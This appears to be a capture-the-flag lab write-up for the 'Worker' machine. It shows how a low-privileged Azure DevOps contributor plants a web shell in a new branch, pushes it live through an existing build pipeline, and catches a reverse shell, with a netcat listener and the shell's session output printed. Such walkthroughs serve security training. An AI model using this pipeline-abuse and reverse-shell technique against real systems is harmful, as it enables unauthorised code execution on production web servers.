InfoSec LAB

Worker_Exploitation

Created: 3 min read

Build Exploitation

Security configurations set for the current user, nathen, in the Permission and Control of the target Azure DevOps instance, allow the user to alter the LIVE web applications by making a build using existing pipelines. This particular privilege is granted due to the inherited security configurations from having a transitive group membership to the Contributors group via the SmartHotel360 Teams team.

according to the official microsoft documentation, the Contributors group has both read and write access to repositories, work tracking, pipelines, and more

an additional evidence is supported and provided further by the official microsoft documentation

same goes for building a pipeline

Creating A New Branch To Upload The Payload

Uploading the payload directly into the master branch is NOT permitted for the nathen user as indicated by the error above

Manual

A new branch, webshell, can be manually created in the Branches under the Repos

Automated

Or it could be done by changing the value of the Branch name field in attempt to uploading it directly into the master branch Azure DevOps will automatically create a branch for me

There is the newly created webshell branch from both manual and automated methods

Create A New Build To Push Out The Update

With the privileges given from a transitive membership to the Contributors group, I can push out the update by making a build with existing pipelines. Attempting to create a new pipeline has failed as to the nathen user doesn’t not have permissions to do so

The alpha application that is currently being hosted from the master branch will change its source to the newly created webshell branch that contains the payload

The build request is queued, handled, and eventually executed by the target Azure DevOps instance

Clicking into it reveals that everything went well

┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ curl -s http://alpha.worker.htb/shell.aspx

Invoking the reverse shell within the payload by browsing to the “update”

┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.203] 49861
Windows PowerShell running as user WORKER$ on WORKER
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
ps c:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
ps c:\windows\system32\inetsrv> hostname
Worker
ps c:\windows\system32\inetsrv> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::248
   ipv6 address. . . . . . . . . . . : dead:beef::88b5:926:be4b:fd40
   link-local ipv6 address . . . . . : fe80::88b5:926:be4b:fd40%4
   ipv4 address. . . . . . . . . . . : 10.10.10.203
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%4
                                       10.10.10.2

Initial Foothold established to the target system as the iis apppool\defaultapppool account via Azure DevOps Build Exploitation

Interactive Graph View

Backlinks